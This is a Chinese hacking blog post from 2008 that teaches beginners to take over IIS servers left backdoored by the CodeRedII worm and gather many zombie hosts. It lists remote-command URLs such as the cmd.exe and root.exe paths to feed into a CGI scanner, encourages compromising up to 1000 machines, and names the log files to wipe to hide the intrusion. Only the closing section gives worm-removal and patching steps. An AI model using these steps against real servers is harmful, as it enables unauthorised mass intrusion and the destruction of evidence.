废物利用:利用CodeRedI...

on 2008-11-15 in web服务器 | 0 Comment
能控制大量主机是很多小鸟鸟的梦想。用CodeRedII后门这种方法可以让不太懂电脑的人也能得到大量肉鸡。这比用流光挂字典挡暴力破解要快的多哦!再说我也不喜欢暴力哦。很久以前就有个人在我面前炫耀一天能黑掉100台主机。他便自以为很了不起是高手了。现在我可以告诉大家,其实只要方法得当,即使是菜鸟加上些运气的话,(现在网上这种主机蛮多的,所以我也相信你会有好运的。)如果有足够的时间和耐心的话,你能在网上干掉1000台这样的主机,呵呵,1000台从数量上来看,这不比红客联盟5.1的战绩表里的主机数差太多吧。不过真正要去黑1000台的话,我想那一定是很枯燥很无聊的。我现在没那个心情去,一开学就要再去读高三了,都是希望能考个计算机的专业嘛,5555)你可以去试试,不过到时候你感到自己很无聊很白痴的话,就不能怪我了。

好!废话少说。先来了解CodeRedII。

CodeRedII影响系统:

Microsoft Windows IIS 4.0 with Index Server
- Microsoft Windows NT 4.0

Microsoft Windows IIS 5.0 with Index Service
- Microsoft Windows 2000

某些型号CISCO路由器(我想这个一定也很好耍啊!!呵呵!!)

入侵原理:
CodeRedII是利用微软Index Server(.ida/idq) ISAPI扩展远程溢出漏洞入侵的。
他还设置了后门程序在被入侵主机上。(这代表着可以给菜鸟很多肉鸡啊!!!呵呵!而且在Windows 2000系统上,通过这个蠕虫可以获取系统(system)级权限的。

利用:
因为蠕虫通过修改上面的注册表增加了两个虚拟web目录(/c和/d),并将其分别映射到C:\和D:\。在root.exe还存在的情况下可以用http://TARGET/c/inetpub/scripts/root.exe?/c+dir。
即使root.exe已经被删除,也能用http://TARGET/c/winnt/system32/cmd.exe?/c+dir
(实http://TARGET/c/等价于 C:\ 而root.exe=cmd.exe)
而且你还可以用
http://TARGET/scripts/root.exe?/c+dir
http://TARGET/msadc/root.exe?/c+dir 扫描。

用法就是用cgi扫描器在扫描项中添上
http://TARGET/c/winnt/system32/cmd.exe?/c+dir(推荐)
如果能成功的话,在ie中添上http://TARGET/c/winnt/system32/cmd.exe?/c+dir
就可以看到对方的c:下的文件了。

改主页和得到帐号的具体方法和UNICODE漏洞大同小异就不多说了。
(都知道了就不用我废话了。)
不知道就去看以前的教材吧。呵呵!!

扫脚印:
c:\winnt\system32\logfiles\*.*
c:\winnt\system32\dtclog\*.*
c:\winnt\ssytem32\config\*.evt
c:\winnt\system32\*.log
c:\winnt\system32\*.txt
c:\winnt\*.log
基本上也就是上面这些了。

解决方法:/*还是要说说的嘛!*/

建议受到蠕虫感染的用户重新安装系统,以便清除其他潜在地后门。如果您不能立刻重装系统,您可以参考下列步骤来清除蠕虫:

1. 停止IIS服务,以防止蠕虫的进一步攻击

2. 打开任务管理器,选择进程。检查是否进程中有两个"exploer.exe".如果您找到两个"exploer.exe",说明木马已经在您的机器上运行了,您应当立刻杀掉木马程序;否则,说明您还没有执行木马程序,您可以转到第四步。

3. 在菜单中选择 查看| 选定列 | 线程计数,按确定。这时您会发现显示框中增加了新的一列"线程数"。检查两个"exploer.exe", 显示只有一个线程的"exploer.exe"就是木马程序。您应当结束这个进程的操作。

4. 您需要删除C:\exploer.exe和D:\exploer.exe。注意:这两个程序都设置了隐藏和只读 属性。您需要设置"资源管理器"的 查看 | 选项 | 隐藏文件 为"显示所有文件"才能看 到它们。

5. 您需要删除root.exe. 它们在IIS的scripts和MSADC目录下。缺省可能是下列目录:

C:\inetpub\scripts\root.exe
D:\inetpub\scripts\root.exe
C:\program files\common files\system\MSADC\root.exe
D:\program files\common files\system\MSADC\root.exe

6. 修复蠕虫创建的注册表项:

* 备份注册表
* 使用regedit,找到下列表项:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\
Virtual Roots
将"/C"和"/D"的项删除。将"/scripts"和"/MSADC"项中",,217"改成",,201"

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\WinLogon
蠕虫已经将其变为0FFFFFF9Dh,将这一项的值改变为0。

7. 安装微软提供的补丁。

微软已经发布了一个安全公告MS01-033:
http://www.microsoft.com/technet/se...in/MS01-033.asp

同时提供了针对NT和2000系统的补丁:
. Windows NT 4.0:
http://www.microsoft.com/Downloads/...ReleaseID=30833

. Windows 2000 Professional, Server and Advanced Server:
http://www.microsoft.com/Downloads/...ReleaseID=30800

8. 重新启动系统

其实贴这篇垃圾出来肯定会让很多高手笑话。我也只是希望能为新手入门时找些能提高兴趣的东东罢了
Tags: 

延伸阅读

最新评论

发表评论